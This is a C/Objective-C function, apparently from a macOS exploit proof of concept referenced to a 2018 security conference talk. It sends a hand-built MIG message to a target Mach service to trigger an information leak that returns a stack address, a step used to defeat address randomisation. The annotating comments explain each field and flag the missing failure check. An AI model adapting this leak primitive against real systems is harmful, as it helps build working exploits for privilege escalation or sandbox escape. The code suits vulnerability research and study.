/*
 * Sends one hand-built MIG request to the port in the global `getport` and
 * copies a value read back from the reply into the global `stack_addr`.
 *
 * Names used but not defined here (declared elsewhere in the file):
 *   leak_msg_t  - message type; the fields touched below are header, NDR,
 *                 size and leak_addr. The 36-byte size hard-coded for
 *                 msgh_size and for mach_msg's send_size must match its
 *                 layout -- TODO confirm against the typedef.
 *   getport     - send right to the target service; how it was obtained is
 *                 not visible here.
 *   stack_addr  - written unconditionally at the end of this function.
 *
 * Returns nothing. A mach_msg failure is only logged (see the note before
 * the final assignment).
 */
void leak_addr()
{   
    mach_msg_return_t ret;
    leak_msg_t message;
    // Reply port; a send-once right on it is minted for the receiver below.
    mach_port_t replyPort = mig_get_reply_port();
    memset(&message, 0, sizeof(message));
    message.header.msgh_remote_port = getport;
    message.header.msgh_local_port = replyPort;
    // Destination: copy of our existing send right. Reply: make send-once on replyPort.
    message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    // Request size, duplicated literally as the send_size argument of mach_msg below.
    message.header.msgh_size = 36;
    // Evaluates to 0x730f; presumably MIG subsystem base 0x7210 plus a routine
    // index of 0xff -- verify against the service's .defs.
    message.header.msgh_id = 0x7210 + 0xff;
    message.NDR = NDR_record;
    message.size = 0;
    // Sentinel. If the leak bug triggers, the reply overwrites this with a
    // stack value; otherwise it is left unchanged. Nothing else in this
    // function distinguishes the two cases.
    message.leak_addr = 0x1337;
    // Combined send + receive on the same buffer: the reply is written back
    // into `message` (receive limit 0xffff bytes), blocking with no timeout.
    ret = mach_msg(&(message.header), MACH_SEND_MSG | MACH_RCV_MSG,
                    36, 0xffff, replyPort,
                    MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    if(ret != MACH_MSG_SUCCESS) {
        NSLog(@"mach_msg fail.\n");
        mach_error("mach_msg:" , ret);
    }
    // NOTE(review): no early return above, so this runs even when mach_msg
    // failed or the reply left leak_addr at its sentinel; stack_addr then
    // typically holds 0x7fff00000000 | 0x1337, not a real address. Callers
    // have no way to tell that apart from a successful leak.
    // The OR assumes leak_addr carries only the low bits of a user-space
    // address -- TODO confirm the field's width in leak_msg_t.
    stack_addr = 0x7fff00000000 | message.leak_addr;
}



Reference: zer0con2018_singi
